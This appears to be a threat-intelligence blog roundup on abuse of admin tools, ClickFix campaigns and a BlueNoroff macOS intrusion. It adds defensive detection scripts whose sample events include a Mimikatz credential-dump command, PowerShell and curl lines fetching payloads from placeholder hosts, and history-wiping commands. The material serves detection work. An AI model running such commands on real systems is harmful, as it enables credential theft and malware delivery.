CTI Roundup: Rogue Tools, ClickFix, and BlueNoroff
Cyber attackers exploit legitimate tools, ClickFix attacks accelerate, and BlueNoroff targets macOS devices
In this week’s roundup, the Tanium CTI team explores how threat actors are increasingly abusing legitimate tools for malicious purposes. We then examine the recent surge in ClickFix campaigns involving GHOSTPULSE malware, followed by a look at a sophisticated intrusion attributed to the BlueNoroff group.
Cyber attackers exploit legitimate tools
A recent post from Cisco Talos explores how cyber attackers are increasingly exploiting legitimate tools for malicious purposes. This growing trend highlights the need for organizations to monitor tool usage patterns and adopt behavior-based detection strategies.
Cisco Talos starts with an example in which an analyst was alerted by their security information and event management (SIEM) solution. The detection was configured to trigger when specific system tools were executed in rapid succession, and it fired overnight, which raised additional suspicion. The team was able to isolate the affected systems and trace the activity.
What are LOLBins?
According to Cisco Talos, threat actors frequently leverage living off the land binaries (LOLBins): tools that ship with the operating system and can be abused to carry out malicious actions without downloading or installing additional software. Because these tools are already present and are routinely used for legitimate administration, distinguishing abuse from normal activity is difficult.
Beyond LOLBins, actors also abuse commercial and open-source tools. One example is DonPAPI, an open-source tool that automates remote dumping of DPAPI-protected credentials. It has been observed in multiple engagements.
[Read also: 15 cybersecurity terms you (and your CEO) ought to know by now]
Types of commonly abused tools
The Cisco Talos report outlines the most commonly abused tools today, including:
- PsExec is a part of Microsoft’s Sysinternals tool suite and enables users to execute commands on both local and remote systems. Ransomware groups frequently use PsExec to execute payloads across multiple systems within a domain.
- Impacket is an open-source collection of Python classes for working with network protocols such as SMB and MSRPC. Threat actors often use its bundled scripts to gain a foothold and move laterally within environments.
- Mimikatz is a credential-dumping utility that extracts plaintext passwords, hashes, and tickets from memory. It is commonly used by penetration testers and red teams, but cybercriminals also use Mimikatz to harvest account credentials that enable lateral movement.
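The SIEM rule described in the opening example (several admin tools executed in rapid succession, overnight) is easy to express as a sliding-window correlation over process-creation events. The block below is an added example written for this roundup; it is not Cisco Talos' or Tanium's detection logic. The log line format, the watch list (built from the tools named above plus LOLBins that commonly surround them), the five-minute window, the four-tool threshold, and the overnight hours are all assumptions chosen for illustration, and the sample telemetry is constructed.

```python
"""Behavior-based burst detection over process-creation events.

Added example for this roundup; not Cisco Talos' or Tanium's detection logic.
Log format, watch list, window, threshold and overnight hours are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Watch list: tools named in the report (PsExec, Mimikatz) plus LOLBins that
# commonly surround them. Impacket runs from the attacker's box, so on the
# target it shows up as the processes it spawns (cmd.exe, wmic.exe, ...).
WATCHED_IMAGES = {
    "psexec.exe", "psexesvc.exe",     # PsExec client / the service it drops on targets
    "mimikatz.exe",
    "cmd.exe", "powershell.exe", "wmic.exe", "net.exe", "net1.exe",
    "sc.exe", "schtasks.exe", "rundll32.exe", "certutil.exe",
}
WINDOW = timedelta(minutes=5)
MIN_DISTINCT_TOOLS = 4                    # distinct watched tools in one window
OFF_HOURS_START, OFF_HOURS_END = 20, 6    # 20:00-06:00 local counts as overnight


def parse_event(line):
    """Parse a constructed line: '<ISO ts> host=<h> user=<u> image=<exe> cmd=<args>'."""
    ts, host, user, image, cmd = line.split(" ", 4)
    return {
        "ts": datetime.fromisoformat(ts),
        "host": host.split("=", 1)[1],
        "user": user.split("=", 1)[1],
        "image": image.split("=", 1)[1].lower(),
        "cmd": cmd.split("=", 1)[1],
    }


def is_off_hours(ts):
    return ts.hour >= OFF_HOURS_START or ts.hour < OFF_HOURS_END


def find_tool_bursts(lines):
    """Return one alert per burst of >= MIN_DISTINCT_TOOLS watched tools on a host."""
    by_host = defaultdict(list)
    for ev in map(parse_event, lines):
        if ev["image"] in WATCHED_IMAGES:
            by_host[ev["host"]].append(ev)

    alerts = []
    for host, events in by_host.items():
        events.sort(key=lambda e: e["ts"])
        i = 0
        while i < len(events):
            start = events[i]["ts"]
            # events are sorted, so the window is a contiguous slice starting at i
            window = [e for e in events[i:] if e["ts"] - start <= WINDOW]
            tools = sorted({e["image"] for e in window})
            if len(tools) >= MIN_DISTINCT_TOOLS:
                alerts.append({
                    "host": host,
                    "users": sorted({e["user"] for e in window}),
                    "start": start.isoformat(),
                    "end": window[-1]["ts"].isoformat(),
                    "tools": tools,
                    "off_hours": is_off_hours(start),
                })
                i += len(window)        # do not re-alert on the same burst
            else:
                i += 1
    return alerts


# Constructed sample telemetry (not real logs): an overnight burst on WS-12 and
# routine, spread-out admin activity on WS-07.
SAMPLE_LOG = [
    "2025-06-10T02:13:05 host=WS-12 user=jdoe image=cmd.exe cmd=cmd.exe /c whoami",
    "2025-06-10T02:13:20 host=WS-12 user=jdoe image=net.exe cmd=net group \"Domain Admins\" /domain",
    "2025-06-10T02:14:02 host=WS-12 user=jdoe image=wmic.exe cmd=wmic process list brief",
    "2025-06-10T02:15:30 host=WS-12 user=SYSTEM image=psexesvc.exe cmd=C:\\Windows\\PSEXESVC.exe",
    "2025-06-10T02:16:11 host=WS-12 user=jdoe image=mimikatz.exe cmd=mimikatz.exe sekurlsa::logonpasswords",
    "2025-06-10T09:02:44 host=WS-07 user=itadmin image=powershell.exe cmd=powershell.exe Get-Service Spooler",
    "2025-06-10T09:03:10 host=WS-07 user=itadmin image=sc.exe cmd=sc query Spooler",
    "2025-06-10T14:20:00 host=WS-07 user=itadmin image=schtasks.exe cmd=schtasks /query",
]

if __name__ == "__main__":
    for alert in find_tool_bursts(SAMPLE_LOG):
        print(alert)
```

Run as-is, the rule fires once, for WS-12 at 02:13 with five distinct tools, and stays quiet for the daytime administrator on WS-07 whose tool use is spread across hours. The `off_hours` flag is what lets a triage queue rank the overnight burst first; the threshold and window are the knobs to tune against your own baseline of admin activity.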
When remote access management tools become threat vectors
Cisco Talos also discovered an increase in the abuse of remote monitoring and management (RMM) tools.
These tools are typically used by IT teams or MSPs to provide remote access to systems for support, and it is easy to see why threat actors would want the same easy remote access. Attackers are now using these tools to maintain persistence and avoid detection, since traffic from a known RMM agent rarely looks out of place.
Analyst comments from Tanium’s Cyber Threat Intelligence team
It’s becoming more challenging to distinguish between legitimate administrative activity and malicious behavior. This blurring of the lines makes traditional signature-based detection less effective, and behavior-based and anomaly detections more critical.
Staying informed on the latest abuse involving open-source and commercial tools is key for defending against this threat.
ClickFix campaigns continue to accelerate
Elastic Security Labs is reporting a rise in ClickFix campaigns, particularly those leveraging the GHOSTPULSE malware loader to deliver remote access trojans (RATs) and infostealers. Although ClickFix has been in use since early 2024, its activity has recently intensified.
Elastic detailed a campaign that showcased the full attack chain—highlighting the components involved, the techniques used, and the malware ultimately delivered.
What are ClickFix attacks?
ClickFix-style attacks rely on social engineering, tricking users into taking unsafe actions by mimicking legitimate processes to build trust and lower defenses.
For example, this type of attack can appear as a fake CAPTCHA prompt that asks the user to paste and execute code on their device.
How do ClickFix attacks work?
As Elastic highlights, ClickFix is often the entry point in a multi-stage attack chain. In one analyzed campaign, the attack flow progression looked like this:
Step 1: Phishing with ClickFix
- The attack begins with a phishing page mimicking a Cloudflare Captcha prompt
- Victims are tricked into pasting and executing PowerShell code
- This code downloads a ZIP file containing components for the GHOSTPULSE loader
Step 2: GHOSTPULSE loader activation
- Decrypts a file bundled in the downloaded ZIP to recover Stage 1
- Extracts Stage 2 code, which checks for specific running processes
Step 3: ARECHCLIENT2 deployment
- Targets browser-stored passwords, cookies, and autofill data
- Performs system profiling and reconnaissance
- Executes commands
Elastic determined that the original Captcha page was hosted under two domains, both of which it linked to a digital advertising agency. Elastic believes the attacker compromised the server hosting those domains in order to stage the page.
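Step 1 of the chain above leaves a distinctive footprint on the endpoint: a console host started by the interactive shell (the Run dialog the victim pastes into is a child of explorer.exe) with a command line that fetches and unpacks an archive. The block below is an added example written for this roundup, not Elastic's detection logic, and it does not reproduce the campaign's real command lines. The event layout, indicator patterns, weights and threshold are assumptions; the sample events are constructed. It also handles one evasion the page's description does not mention but a practitioner will meet: the same command hidden behind `-EncodedCommand`.

```python
"""Heuristic for ClickFix-style execution on Windows endpoints.

Added example for this roundup; not Elastic's detection logic. Event layout,
indicator regexes, weights and threshold are assumptions.
"""
import base64
import re

INTERACTIVE_PARENTS = {"explorer.exe"}    # Win+R / Run dialog launches land here
CONSOLE_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# (name, weight, regex), matched case-insensitively against the command line
# including anything recovered from -EncodedCommand.
INDICATORS = [
    ("download", 2, re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|\bwget\b|https?://", re.I)),
    ("archive", 1, re.compile(r"expand-archive|\.zip\b|extracttodirectory", re.I)),
    ("hidden", 1, re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
    ("iex", 1, re.compile(r"\biex\b|invoke-expression", re.I)),
]
# PowerShell accepts any unique prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENCODED = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
THRESHOLD = 4


def expand_command(cmd):
    """Append the decoded form of any -EncodedCommand argument so indicators can see it."""
    m = ENCODED.search(cmd)
    if not m:
        return cmd
    try:
        # -EncodedCommand is base64 over UTF-16LE; invalid input is left alone
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return cmd + " " + decoded


def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    if ev["image"].lower() not in CONSOLE_HOSTS:
        return 0, []
    score, reasons = 0, []
    if ev["parent_image"].lower() in INTERACTIVE_PARENTS:
        score += 2
        reasons.append("parent_interactive_shell")
    cmd = expand_command(ev["cmdline"])
    for name, weight, rx in INDICATORS:
        if rx.search(cmd):
            score += weight
            reasons.append(name)
    return score, reasons


def find_clickfix(events):
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= THRESHOLD:
            alerts.append({"host": ev["host"], "pid": ev["pid"], "score": score, "reasons": reasons})
    return alerts


def _enc(ps):
    """Only used to construct the sample: encode a script the way -EncodedCommand expects."""
    return base64.b64encode(ps.encode("utf-16le")).decode()


# Constructed sample events (hostnames and URLs are placeholders, not real IOCs).
SAMPLE_EVENTS = [
    # 1) victim pasted the "verification" command into the Run dialog
    {"host": "WS-31", "pid": 4120, "parent_image": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -nop -c \"iwr https://captcha-check.example.invalid/v.zip "
                "-OutFile $env:TEMP\\v.zip; Expand-Archive $env:TEMP\\v.zip $env:TEMP\\v\""},
    # 2) same idea, hidden behind -EncodedCommand
    {"host": "WS-31", "pid": 4188, "parent_image": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -enc " + _enc("iwr https://captcha-check.example.invalid/v.zip -OutFile v.zip; Expand-Archive v.zip")},
    # 3) benign interactive use
    {"host": "WS-31", "pid": 4200, "parent_image": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell Get-Date"},
    # 4) scheduled automation that downloads an update: no interactive parent, stays under threshold
    {"host": "SRV-02", "pid": 912, "parent_image": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\fetch-update.ps1 https://updates.example.invalid/patch.zip"},
]

if __name__ == "__main__":
    for alert in find_clickfix(SAMPLE_EVENTS):
        print(alert)
```

The two pasted commands alert (scores 6 and 5); the interactive `Get-Date` and the non-interactive update script do not. Weighting the explorer.exe parent heavily is deliberate: a download from a scheduler or service is routine, the same download typed into the Run dialog almost never is.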
Related CTI reports on ClickFix
For more on how ClickFix has evolved across recent campaigns, check out these past CTI roundups:
- Published April 30, 2025: Explores how nation-state actors from North Korea, Iran, and Russia have recently adopted the ClickFix technique to deliver malware through social engineering
- Published March 12, 2025: Highlights a ClickFix-style phishing campaign that uses SharePoint and Microsoft Graph API to stealthily deploy a modified Havoc Demon agent
- Published June 26, 2024: Includes insights into ClickFix being used in widespread phishing campaigns to deliver malware like Vidar Stealer, with TA571 sending over 100,000 emails using fake document lures
Analyst comments from Tanium’s Cyber Threat Intelligence team
This surge in ClickFix attacks shows how social engineering and malware delivery tactics are evolving. The technique relies on the victim's trust and curiosity, which makes it both hard to detect and more likely to succeed than the phishing methods users have already been trained to recognize.
It’s worth noting that ClickFix isn’t just being used by low-level cybercriminals, but also by more sophisticated state-sponsored groups. Security teams are encouraged to focus on user education and use behavioral detection to identify suspicious activity.
BlueNoroff targets macOS devices
Researchers at Huntress recently analyzed a sophisticated intrusion campaign targeting macOS users in the Web3 space. Huntress is attributing the campaign to the BlueNoroff group.
The attack leveraged social engineering and a trojanized application to deploy malware capable of credential theft, surveillance, and persistence. It began when a threat actor tricked an employee into joining a spoofed Zoom meeting populated with deepfakes of the company’s senior leadership.
[Read also: Hiring remote IT workers? Beware the deepfake frauds]
Exploiting trust: Gaining access through a fake meeting invite
The initial contact came via Telegram, where the attacker—posing as an external contact—invited the employee to a live conversation. The message included a Calendly link that appeared to schedule a Google Meet session but instead redirected to a spoofed Zoom domain.
Weeks later, when the employee joined the meeting, they were met with several deepfakes of senior leaders within their own company in addition to the external contact. The deepfakes instructed the employee to download a Zoom extension because their microphone wasn’t working. The downloaded file was an AppleScript that opened the legitimate Zoom SDK webpage while silently downloading a payload from a malicious site.
According to Huntress, the script disables bash history logging, ensures Rosetta 2 is installed, and attempts to obtain and verify the user's password. At the end, it removes the shell history to make analysis more difficult.
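Each of the behaviors Huntress describes for the AppleScript shows up as a separate child process of osascript, so a sensible way to catch this chain is to score the whole subtree under a user-launched script rather than any single event. The block below is an added example written for this roundup; it is not Huntress' detection logic and does not reproduce the script's real command lines. The event layout, the specific commands matched (curl, `softwareupdate --install-rosetta`, `dscl . -authonly`, and history-file removal or `HISTFILE` tampering), the weights and the threshold are assumptions, and the sample process tree is constructed.

```python
"""Process-lineage scoring for the macOS AppleScript chain described above.

Added example for this roundup; not Huntress' detection logic. Event layout,
matched commands, weights and threshold are assumptions.
"""
import re
from collections import defaultdict

INDICATORS = [
    ("download",       2, re.compile(r"\b(?:curl|wget)\b.*https?://")),
    ("rosetta",        1, re.compile(r"softwareupdate\b.*--install-rosetta")),
    ("password_check", 2, re.compile(r"\bdscl\b.*-authonly|display dialog.*hidden answer", re.I)),
    ("history_tamper", 2, re.compile(r"\.(?:bash|zsh)_history|HISTFILE|history -c|set \+o history")),
]
THRESHOLD = 4


def build_tree(events):
    """Map pid -> event and ppid -> [child events]."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    return by_pid, children


def descendants(pid, children):
    """Depth-first walk of a subtree; the root itself is not yielded."""
    stack = list(children.get(pid, []))
    while stack:
        e = stack.pop()
        yield e
        stack.extend(children.get(e["pid"], []))


def score_osascript_trees(events):
    """Return one alert per osascript root whose subtree scores >= THRESHOLD.

    Each indicator counts once per tree, so a script that removes three history
    files is not scored three times.
    """
    _, children = build_tree(events)
    alerts = []
    for root in events:
        if root["image"] != "osascript":
            continue
        hits, score = {}, 0
        for e in descendants(root["pid"], children):
            for name, weight, rx in INDICATORS:
                if name not in hits and rx.search(e["args"]):
                    hits[name] = e["pid"]
                    score += weight
        if score >= THRESHOLD:
            alerts.append({"root_pid": root["pid"], "script": root["args"],
                           "score": score, "indicators": hits})
    return alerts


# Constructed sample process tree (paths and URLs are placeholders, not real IOCs).
SAMPLE_EVENTS = [
    # malicious chain: the "Zoom extension" the victim was told to run
    {"pid": 4101, "ppid": 1,    "image": "osascript",      "args": "osascript /Users/jdoe/Downloads/zoom_sdk_support.scpt"},
    {"pid": 4102, "ppid": 4101, "image": "open",           "args": "open https://zoom-sdk-docs.example.invalid/"},  # stand-in for the legitimate page it opens
    {"pid": 4103, "ppid": 4101, "image": "bash",           "args": "bash -c unset HISTFILE; set +o history"},
    {"pid": 4104, "ppid": 4101, "image": "softwareupdate", "args": "softwareupdate --install-rosetta --agree-to-license"},
    {"pid": 4105, "ppid": 4101, "image": "curl",           "args": "curl -fsSL https://update.example.invalid/helper -o /tmp/.helper"},
    {"pid": 4106, "ppid": 4101, "image": "osascript",      "args": "osascript -e display dialog \"Enter your password\" default answer \"\" with hidden answer"},
    {"pid": 4107, "ppid": 4101, "image": "dscl",           "args": "dscl . -authonly jdoe [redacted]"},
    {"pid": 4108, "ppid": 4101, "image": "rm",             "args": "rm -f /Users/jdoe/.bash_history /Users/jdoe/.zsh_history"},
    # benign automation: a backup script that opens its report
    {"pid": 5200, "ppid": 1,    "image": "osascript",      "args": "osascript /Users/jdoe/Library/Scripts/backup_done.scpt"},
    {"pid": 5201, "ppid": 5200, "image": "open",           "args": "open /Volumes/Backup/report.html"},
]

if __name__ == "__main__":
    for alert in score_osascript_trees(SAMPLE_EVENTS):
        print(alert)
```

Only the tree rooted at pid 4101 alerts, with all four indicators present; the benign backup script scores zero, and the nested osascript at 4106 is examined as a root too but has no children of its own. Scoring the subtree is what makes this robust: any one of the steps (a curl download, a Rosetta install) is unremarkable on its own, and it is the combination under a single user-launched script that is the signal.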
Malware breakdown: Tools, tactics, and implants
Huntress identified several malicious binaries on the victim’s host. More details of each of these binaries can be found in the Huntress report.
- Persistent implant: A binary named Telegram 2, written in Nim, acts as the persistence mechanism and initiates the backdoor. It is lightweight and has limited functionality: running echo commands, executing commands via /bin/bash, launching an interactive shell, and establishing persistence.
- Backdoor: The Root Troy V4 (RTV) backdoor, written in Go, executes an AppleScript payload to download an additional implant. Huntress observed this command being executed six times between device onboarding and host isolation. RTV supports remote code execution, including while the system is asleep.
- Loader with two additional payloads: A binary named "a" is downloaded via the AppleScript payload. It accepts another binary and a password as arguments, decrypts two embedded payloads, and can overwrite all files in the current directory with zeros.
Notably, Huntress highlighted the two-part process injection capability, which is uncommon on macOS, as a standout feature:
1. The first decrypted payload is a Nim-based implant used for command-and-control communication.
2. The second is a minimal Swift-based application, likely used to support the implant's functionality.
- Keylogger: The attacker deployed XScreen, a tool for keylogging, screen recording, and clipboard data capture.
- Infostealer: The airmond infostealer targets cryptocurrency wallets by scanning installed browser extensions and extracting associated data.
- Decoy binary: The final binary, NetChk, is nearly empty. It continuously generates random numbers, likely as a decoy to distract analysts during investigation.
Analyst comments from Tanium’s Cyber Threat Intelligence team
BlueNoroff has evolved its tactics to exploit the Web3 ecosystem. The group’s ability to create and use complex macOS malware further demonstrates its sophistication and investment in cross-platform capabilities.
It’s evident that macOS is becoming a more popular target, especially for advanced threat actors. Aside from their sophisticated technical tactics, the group is also keeping up to date with current landscape trends with its use of deepfakes and advanced social engineering.
The report from Huntress is far more detailed for those looking for more technical analysis.
Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.
For further reading, catch up on our recent cyber threat intelligence roundups.